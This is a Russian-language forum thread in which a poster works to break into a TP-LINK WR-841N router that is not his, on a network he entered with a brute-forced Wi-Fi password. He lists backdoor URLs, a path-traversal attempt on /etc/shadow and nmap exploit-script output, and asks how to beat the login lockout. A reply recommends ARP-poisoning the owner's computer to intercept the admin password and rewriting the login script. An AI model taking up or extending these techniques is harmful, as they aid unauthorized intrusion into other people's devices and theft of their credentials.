Предыдущий тред: https://forum.antichat.ru/threads/452281/ Здравствуйте. Итак, потыкался сегодня Ривером в точку, отправлявшую WSC-NACK после пакета M2. Так и отправляет. Видимо точка заблокировала WPS фактически навсегда (когда-то еще ресет на ней ткнут). Придется идти другим путем. Есть еще кое-какие вопросы по совершенно другой точке, надеюсь вы мне поможете. Текущая задача - пробиться в веб-морду роутера TP-LINK WR-841N. Физического доступа к роутеру нет, но есть возможность подключаться к нему по WAN во внутреннюю сеть (пароль я сбрутил пару недель назад). Роутер после каждых 10 попыток залезть в веб-морду закрывается на два часа. Итак, я погуглил существующие уязвимости и реализующий их софт конкретно для этого роутера. Вышло вот что. Во-первых, веб-закладки: Spoiler 192.168.0.1/userRpmNatDebugRpm26525557/linux_cmdline.html Шелл, позволяющий утащить файлы из роутеров WR-841N и некоторых еще. Доступ к нему без авторизации невозможен. Не подходит, так как у меня нет возможности авторизоваться (routerscan под винду ничего не дал, admin-admin, admin-password, osteam-5up, admin-1234 и прочие тоже ничего, гидрой брутить имхо нет смысла, см.выше ограничение на попытки). 192.168.0.1/rom-0 Это я подсмотрел в хацкерском видео с ютуба, где взламывали такой же роутер. В моем случае попытка сюда зайти перенаправляет на форму авторизации. Опять-таки не то. 192.168.0.1/userRpmNatDebugRpm26525557/start_art.html При попытке сюда зайти роутер должен в ответ поискать на моем компьютере сервер TFTP, скачать оттуда файл nart.out и запустить с root-правами. Если сервера на моем компьютере нет, точка должна самоурониться. Итак, я попробовал эту вещичку и точка не уронилась. Видимо не работает. 192.168.0.1/ ../ ../etc/shadow и прочие вариации / ../. "You have no authority to access this router!". При попытке зайти из внутренней сети то же самое. При попытке выставить во внутренней сети статический адрес 192.168.0.66 (в интернете говорят что это помогает) - то же самое. Не то. Во-вторых, арсенал Kali: NMap со скриптом: Spoiler Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-06-13 18:00 EDT Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 4.46 seconds root@mol:~# nmap 000.000.000.000 -p 8080 --script http-tplink-dir-traversal.nse -Pn Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-06-13 18:00 EDT Nmap scan report for 000.000.000.000 Host is up (0.0054s latency). PORT STATE SERVICE 8080/tcp open http-proxy Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds root@mol:~# nmap 000.000.000.000 -p 8080 --script +http-tplink-dir-traversal.nse -Pn Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-06-13 18:00 EDT Nmap scan report for 000.000.000.000 Host is up (0.0060s latency). PORT STATE SERVICE 8080/tcp open http-proxy Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds root@mol:~# nmap 000.000.000.000 -p 8080 --script +http-tplink-dir-traversal.nse -d -Pn Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-06-13 18:01 EDT --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 1000, min 100, max 10000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 0 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- NSE: Using Lua 5.2. NSE: Arguments from CLI: NSE: Loaded 1 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 1) scan. Initiating NSE at 18:01 Completed NSE at 18:01, 0.00s elapsed mass_rdns: Using DNS server 192.168.1.1 Initiating Parallel DNS resolution of 1 host. at 18:01 mass_rdns: 0.00s 0/1 [#: 1, OK: 0, NX: 0, DR: 0, SF: 0, TR: 1] Completed Parallel DNS resolution of 1 host. at 18:01, 0.00s elapsed DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 18:01 Scanning 000.000.000.000 [1 port] Packet capture filter (device wlan0): dst host 192.168.1.38 and (icmp or icmp6 or ((tcp or udp or sctp) and (src host 000.000.000.000))) Completed SYN Stealth Scan at 18:01, 2.01s elapsed (1 total ports) Overall sending rates: 1.00 packets / s, 43.84 bytes / s. NSE: Script scanning 000.000.000.000. NSE: Starting runlevel 1 (of 1) scan. Initiating NSE at 18:01 Completed NSE at 18:01, 0.00s elapsed Nmap scan report for 000.000.000.000 Host is up, received user-set. Scanned at 2017-06-13 18:01:01 EDT for 2s PORT STATE SERVICE REASON 8080/tcp filtered http-proxy no-response NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 1) scan. Initiating NSE at 18:01 Completed NSE at 18:01, 0.00s elapsed Read from /usr/bin/../share/nmap: nmap-payloads nmap-services. Nmap done: 1 IP address (1 host up) scanned in 2.31 seconds Raw packets sent: 2 (88B) | Rcvd: 0 (0B) Скрипт вроде бы работает, только я не понимаю как и что мне делать для несколько более конкретных результатов. Странно что он согласился работать только после "плюсика". Ну и в-третьих потыкался метасплоитом и routersploit'ом, ну возможности обоих в отношении роутеров которые не дилинк довольно скромны. Безрезультатно. Вопросы таковы: 1. Как заставить работать скрипт http-tplink-dir-traversal.nse? 2. Можно ли чем-то сбрутить веб-морду при существующих ограничениях, в обход их? Далее, слегка насторожило поведение роутера. Последние дни я в него тыкался своими инструментами, а сегодня он внезапно в течение суток: - сначала сменил порт веб-морды с 8080 на 80. Было ip:8080, cтало ip:80. Я сначала подумал что роутер лег, но не тут-то было. Просто порт сменил. Кто это сделал - роутер или хозяин? Из-за бага или намеренно? - перезагрузился. Затем получил от провайдера новый адрес по DHCP (старая российская схема, когда компьютеры соединены в локалку со статическими адресами-шлюзами и поверх этой локалки если нужен интернет устанавливается VPN с логином-паролем и адресом DHCP) и соответственно старый контакт оборвался. Пришлось опять внешний его адрес узнавать. У меня работал батник на основной системе (винда соответственно), пинговавший старый адрес раз в десять минут. Порт с 8080 на 80 роутер сменил в промежутке между этой ночью и этим полуднем, а перезагрузился (ну мне кажется что он перезагрузился, суть в том что он переподключился по VPN к провайдеру) в промежутке между 23:05 и 23:15. Есть идеи отчего это произошло? Я его не дудосил, и с хозяином точки не пересекался =) И еще капельку смутило что NMap без -Pn не желал признавать существование точки, хотя виндовой пинг исправно работал и работает. Ну это ладно. Всем спасибо за помощь.
По порядку: 1. Traversal эксплойты везде одинаковы, и в случае TP-Link ими можно лишь получить Wi-Fi параметры - в Router Scan они все уже есть, смысла пробовать Nmap-скрипт нет 2. Порт веб интерфейса мог сменить лишь администратор роутера 3. Поскольку у вас есть возможность находиться внутри сети, устройте ARP Poison атаку на комп админа, и спровоцируйте его зайти на роутер - это единственный способ получить пароль Примечание: Последняя версия прошивок для TP-Link (как раз та, что блокируется на 2 часа) отправляет форму входа связкой login:base64(md5(password)). После перехвата пароль придётся ещё брутить. Но тем же MITMом это дело можно упростить, переписав скрипт логина (но тут нужен определённый скилл).